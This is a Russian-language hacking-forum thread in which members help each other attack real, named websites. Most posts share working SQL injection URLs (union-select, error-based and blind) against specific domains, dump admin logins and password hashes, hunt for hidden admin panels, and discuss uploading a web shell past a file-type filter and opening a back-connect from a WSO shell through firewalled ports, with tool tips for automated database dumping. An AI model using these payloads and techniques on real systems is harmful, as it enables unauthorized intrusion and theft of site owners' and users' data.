http://lpb-company.ru/robots.txt

А админка тут:

http://lpb-company.ru/admin/

Только доступ туда не всем разрешен.

XAMEHA said:
Почитать можно тут:
http://lpb-company.ru/robots.txt
А админка тут:
http://lpb-company.ru/admin/
Только доступ туда не всем разрешен.


эмм... ну я кагбэ нашел папку эту, роботс естественно проверял первым делом. только вот думаю что админка просто не в индексном файле а то и вовсе в папке уровнем ниже. думаю дело не в правах доступа, судя по многочисленным скулям и защите от копирования аля заблокировать пкм, тут просто под иным файлом лежит вход.

никак немагу найти админку http://www.avtomatizator.ru/

Какие есть способы залить шел через админку принимает только расширение jpg, пробывал варианты типо php.jpg.php, php5 но ничё непринимает пишет application/octet-stream - not supported

Как можно залить?

Gedj said:
Какие есть способы залить шел через админку принимает только расширение jpg, пробывал варианты типо php.jpg.php, php5 но ничё непринимает пишет application/octet-stream - not supported
Как можно залить?


Мдаа

/showthread.php?t=229579

У меня наверное тупой вопрос:

Страница принимает параметр


PHP:
$r=$_GET['r'];

Затем $r фильтруется. Можно ли вот так выполнить sql запрос?


PHP:
page.php?r=mysql_query("INSERT ...

Есть страница, которая методом get принимает числовой параметр:


PHP:
page.php?p=1

в коде страницы это значение присваивается переменной $r


PHP:
$r=$_GET['r'];

и только затем оно фильтруется на недопустимые символы.

Если в r передать sql запрос


PHP:
page.php?r=mysql_query("INSERT ...

то по-идее php должен его выполнить:


PHP:
$r=mysql_query("INSERT ... ");

Я прав?

Есть blind-sql. Узнал логин,версию - 5.1.39. А как можно узнать названия таблиц ? Понятно что из INFORMATION_SCHEMA,но как именно будет выглядеть запрос ?

JohnnyBGoode said:
Есть blind-sql. Узнал логин,версию - 5.1.39. А как можно узнать названия таблиц ? Понятно что из INFORMATION_SCHEMA,но как именно будет выглядеть запрос ?


/thread19844.html

AC//DC said:
никак немагу найти админку http://www.avtomatizator.ru/



http://www.avtomatizator.ru/euro/admin/index.php

http://www.avtomatizator.ru/myadmin/

Если у тебя есть инклуд и ты не нашёл как лить файлы, то напиши - подскажу.

P.S. Честно не специально =)) но скулю тоже нашёл, тока не знаю поможет она тебе или нет....

http://www.nexusarts.com.au/ помогите админку найти, плз

CodeSender:) said:
http://www.nexusarts.com.au/ помогите админку найти, плз


http://www.nexusarts.com.au/adminlogin.php

Такая проблема , пытаюсь кинуть бэк конект с шела WSO , но при попытке открыть порт шелл сразу виснет... Типо посылает запрос и через мин 2-3 тупо пустая страница (не получил ответ от сервера). Кто знает как обойти такую проблему ?

SEWERN said:
Такая проблема , пытаюсь кинуть бэк конект с шела WSO , но при попытке открыть порт шелл сразу виснет... Типо посылает запрос и через мин 2-3 тупо пустая страница (не получил ответ от сервера). Кто знает как обойти такую проблему ?


Фаерволом порты прикрыты просто. Пытайся отдать на 20 21 80 443 8080 25 2525 53 ..... как повезёт...

можноли как то заставить сипт или какой другой софт работать с фильтрацией?

дело в том что на сайте админку не нащёл сдампить данные с таблиц не получается софтом т.к стоит фильтр а в ручную 22к это не смешно

Koren said:
можноли как то заставить сипт или какой другой софт работать с фильтрацией?
дело в том что на сайте админку не нащёл сдампить данные с таблиц не получается софтом т.к стоит фильтр а в ручную 22к это не смешно


Вот очень неплохая для этих дел тулза /thread220490.html (https://antichat.live/threads/220490/)

запускаем rsaUnDumper(sql) делаем запрос вида

сайт/detail.php?id=-99+/*!UnIoN+SeLeCt*/+1,2,3,,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ fuck_order+limit+

указываем к примеру то что нум нужно сдампить тоесть state

poscode

phone

mobile

дамп... пошли ошибки записей 0

как только не пробывал что там может не хватать? или дело в запросе?

Koren said:
запускаем rsaUnDumper(sql) делаем запрос вида
сайт/detail.php?id=-99+/*!UnIoN+SeLeCt*/+1,2,3,,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+ fuck_order+limit+
указываем к примеру то что нум нужно сдампить тоесть state
poscode
phone
mobile
дамп... пошли ошибки записей 0
как только не пробывал что там может не хватать? или дело в запросе?


сразу идут ошибки или после какой-то записи?

nemaniak said:
сразу идут ошибки или после какой-то записи?


сразу мен

Koren said:
сразу мен


а по запросу в бразере например /detail.php?id=-99+/*!UnIoN+SeLeCt*/+1,2,3,state,5,6,7,8,9,10,11,12,13,14,15,16,17,18+ from+fuck_order+limit+1,1+--+

нормально выводит?

nemaniak said:
а по запросу в бразере например /detail.php?id=-99+/*!UnIoN+SeLeCt*/+1,2,3,state,5,6,7,8,9,10,11,12,13,14,15,16,17,18+ from+fuck_order+limit+1,1+--+
нормально выводит?


с коментарием -- да , в софте то же он

вернее нормально если добавить group _ concat

Koren said:
с коментарием -- да , в софте то же он


Тогда хз, так не понять, вышли хотя б в личку скрин проги с твоим запросом

такая ситуация. на сайте mysql-inj. но user()=am***ag@nsite1.net

т.е. получается база на другом серве. прочитал mysql.user.

расшифровал пароли. нашел одного юзера у кого host=%

пытаюсь подключится к nsite1.net- выдает access denied

в чем может быть трабла?

j0ker13 said:
такая ситуация. на сайте mysql-inj. но user()=am***ag@nsite1.net
т.е. получается база на другом серве. прочитал mysql.user.
расшифровал пароли. нашел одного юзера у кого host=%
пытаюсь подключится к nsite1.net- выдает access denied
в чем может быть трабла?


Не понял. Нормально объясни.

j0ker13 said:
такая ситуация. на сайте mysql-inj. но user()=am***ag@nsite1.net
т.е. получается база на другом серве. прочитал mysql.user.
расшифровал пароли. нашел одного юзера у кого host=%
пытаюсь подключится к nsite1.net- выдает access denied
в чем может быть трабла?


В том, что доступ к базе данных разрешен только с этого домена.

http://www.radioreference.com/apps/audio/?ctid=92

http://www.radioreference.com/apps/audio/?ctid=92' (opera, not firefox)

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Ip.Ip.Ip.Ip' at line 1

Malygos said:
http://www.radioreference.com/apps/audio/?ctid=92
http://www.radioreference.com/apps/audio/?ctid=92' (opera, not firefox)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Ip.Ip.Ip.Ip' at line 1


Нету тут ничего.

есть уязвимый сайт:


Code:
www.site.com/index.php?login=&passwd='

кол-во столбцов подобрал, но почему то не выводит в какой колонке идет вывод на страницу.

подскажите чё нють плиз.

2-PRIVAT- and Malygos

h--ps://rdot.org/forum/showthread.php?t=685

2Tw!m4

net vyvoda. esli errory vyvodit - poprobui cherez nih

Tw!m4 said:
есть уязвимый сайт:

Code:
www.site.com/index.php?login=&passwd='

кол-во столбцов подобрал, но почему то не выводит в какой колонке идет вывод на страницу.
подскажите чё нють плиз.


Крути как блинд. Мы не экстрасенсы, линк давай!

ПОдскажите плиз есть что-нибудь работающее в паблике для парсинга сайтов из гугла по определенному запросу?

2 -PRIVAT-


Code:
http://rwo[dot]solutions[dot]co[dot]at/login.php?luser=%27union%20select%20null,null,null ,null,null,null,null,null,null,null,null,null,null ,null--%20&passwd=testik%27

вот собственно сайтец

как и говорил, с неверным кол-вом столбцов выдаёт ошибку, при правельном подборе страница показывает как ни в чём не бывало.....

Tw!m4 said:
2 -PRIVAT-

Code:
http://rwo[dot]solutions[dot]co[dot]at/login.php?luser=%27union%20select%20null,null,null ,null,null,null,null,null,null,null,null,null,null ,null--%20&passwd=testik%27

вот собственно сайтец
как и говорил, с неверным кол-вом столбцов выдаёт ошибку, при правельном подборе страница показывает как ни в чём не бывало.....


http://rwo.solutions.co.at/ab/ab.php?id=954+or+(1,1)=(select+count(0),concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)+group+by+2)--+%20&opt=edit

Konqi said:
http://rwo.solutions.co.at/ab/ab.php?id=954+or+(1,1)=(select+count(0),concat((se lect+version()+from+information_schema.tables+limi t+0,1),floor(rand(0)*2))from(information_schema.ta bles)+group+by+2)--+%20&opt=edit


А чё тут должно выйти? Чё т я как то не совсем врубаюсь...у меня выдает 404 еррор

object not found

PS: все пробелы убрал...

Tw!m4 said:
А чё тут должно выйти? Чё т я как то не совсем врубаюсь...у меня выдает 404 еррор
object not found
PS: все пробелы убрал...


работало 2 минут назад, через дупликат

по всей видимости скрипт убрали...

UPD: работает

Duplicate entry '5.0.45-community-nt1' for key 1

http://www.salsacrazy.com помогите админку найти

Bramin said:
http://www.salsacrazy.com помогите админку найти


http://www.salsacrazy.com/cpanel

http://www.cps.am/en/strategy-and-politics/9%27/


pomoqite pojalusta dalse raskrutit sql inj..

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /usr/home/cpsam/public_html/index.php on line 13


?????

-PRIVAT- said:
Нету ничего.


Это blind скуля..

http://www.cps.am/en/strategy-and-politics/9+and+mid(version(),1,1)=5

Имеем вот такую штуку например. Куда крутить?


http://shekinahministry.org/contentMain2.php?category_id=2&articleID=22-999.9+union+select+1,2,3,4--

DCrypt said:
Имеем вот такую штуку например. Куда крутить?


Крути сюда


http://shekinahministry.org/contentMain2.php?category_id=2&articleID=22-999.9+union+select+version%28%29,2,3,4--

DCrypt said:
Имеем вот такую штуку например. Куда крутить?


А в чём вопрос то? Вывод есть ... бери статью по sql inj и крути...

А есть тулза какая нить автоматизации процесса? Базы выдирать нужно. А такого вида телег полно.

sipt; pangolin;

pinch said:
sipt; pangolin;


Я юзаю Havij 1.12 Pro.

Вот например вставляю:


http://www.corpwatch.org/article.php?id=14997-999.9+union+select+1,2,3,4--




Cannot find column count!
Target Not Vulnerable
It seems that input parameter is not effective! Check the following:
Are you sure input parameter really exist?!
Are you sure the input value '14997' is valid?
Are you sure the 'GET' method is correct?


Настройки:

http://s007.radikal.ru/i302/1011/17/351769bf30ad.jpg

http://www.corpwatch.org/article.php?id=14997-999.9+union+select+1,2,3,4--


c чего ты взял что здесь инъекция...

SQL Checker'ом прогнал и доволен) Он много мусора выдает. Надо все ручками проверять.

А в Havij'е эти вещи делаются так:

Target: http://www.corpwatch.org/article.php?id=14997

Syntax: 14997-999.9+union+select+1,%String_Col%,3,4--

%String_Col% - поле вывода.

Ну и Data Base иногда желательно самому выбрать, а то Havij тупить начинает.

pinch said:
c чего ты взял что здесь инъекция...


Значит Sql CheckeR от ac1D говно а автор софта кидала.

==========

Вообщем я в тупике что с этим говном и лже скулями делать.

юзай pangolin там вполне адекватный чеккер...

pinch said:
юзай pangolin там вполне адекватный чеккер...


Кинь линк пожалста. Бо много где клей.

DCrypt said:
Значит Sql CheckeR от ac1D говно а автор софта кидала.
==========
Вообщем я в тупике что с этим говном и лже скулями делать.


Согласен

http://depositfiles.com/files/e3qugp4dn

Помогите найти админку плз

redshoessole.com

SEWERN said:
Помогите найти админку плз
redshoessole.com


http://redshoessole.com/FashionSHOES/wp-login.php

kfor said:
http://redshoessole.com/FashionSHOES/wp-login.php


Спасибо , там должна быть еще одна кроме вп..

SEWERN said:
Спасибо , там должна быть еще одна кроме вп..


Да тебе не угодишь Пробуй залогиниться

http://redshoessole.com/login.php

Скорее всего включаться доп функции.

Кто может помочь с поисками адм http://www.shopzooly.com ?

адм не ВП , а "OnePound"

SEWERN said:
Кто может помочь с поисками адм http://www.shopzooly.com ?
адм не ВП , а "OnePound"


http://www.shopzooly.com/login.php

-PRIVAT- said:
http://www.shopzooly.com/login.php


кэп говорит что это форма авторизации юзеров, а не админов.

d1v said:
кэп говорит что это форма авторизации юзеров, а не админов.


Возможно и админа авторизует. Часто так бывает, знаю по опыту.

d1v said:
кэп говорит что это форма авторизации юзеров, а не админов.


верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%).

Но найти ее трудновато (( "robots.txt" нету(((

SEWERN said:
верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%).
Но найти ее трудновато (( "robots.txt" нету(((


просканил админфайндером и интеллитемпером - результата нет.

вывод: админка в рандомной папке, на другом порту или ваще локальная.

Есть SQL inj

Определил названия таблиц,названия столбцов

Есть в users два таких столбца : password и current_hash.

В котором из них пароль хранится ? В password - MYSQL хэш (расшифровал его,но при авторизации ошибку выдает),в current_hash - md5

2JohnnyBGoode возможно кэпую, но данные из current_hash расшифровать не пробовал?

Bb0y said:
2
JohnnyBGoode
возможно кэпую, но данные из current_hash расшифровать не пробовал?


пытался,положительного результата не достиг

И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся

JohnnyBGoode said:
пытался,положительного результата не достиг
И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся


Ну тогда пробуй расшифровать current_hash сам неможеш выложи на ачат

Всем добрый день. Все вопросы по Sql inj

Первый вопрос, что делать если не могу найти таблицу пользователей, где то встречал уже этот же вопрос, но поиском найти не смог.

На пример :


http://cib.net.ua/catalog.php?catalog_mode=np&list_mode=details&cat=12&ucat=124&code=1900+and+1=0+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,table_name+from+information _schema.tables+limit+0,100+--+


Всё перебрал а такой таблицы найти не смог.

Я подумал, что делаю что то не так, и решил посмотреть в теме Sql инъекции.

Взял последний сайт. Убрал то что там было, и решил сделать сам всё с самого начала.

Вот так перебрал до 50, результат - ничего не найдено


http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,table_name, 4,5,database(),7,8,9+from+information_schema.table s+limit+50,100+--+


Но, тут возникает вопрос, ведь tracy как то узнал


http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,file_priv,4 ,5,6,7,8,9+from+mysql.user+where+user='alexey1'+--+


вопрос как? растолкуйте пожалуйста этот момент.

==================================

Последний вопрос, возможно самый тупой.

У меня всё получилось, я узнал логин и пароль админа


http://www.stepka.com.ua/?mod=viewProduct&id='3'+and+1=0+union+select+1,2,3,4,5,concat_ws(0x 03a,login,passwrd),7,8,9+FROM+users


расшифровал хэш, НО я могу найти админку, поискав по форуму нашёл 1 скрипт и какой то софт, для автоматизации этого процесса, но прогнав этот сайт, всё равно ничего не нашёл. Возможно что то посоветуете?

===================================

Ещё вспомнил

Вот так, если поля логин и пассворд


http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,column_name ,4,5,database(),7,8,9+from+information_schema.colu mns+where+table_name='USER'+limit+11,100+--+


Но после такого запроса


http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+selECt+1,2,login,4,5,p assword,7,8,9+from+USER+limit+0,100+--+


получаю


Table 'krost.USER' doesn't exist


Что я делаю не так?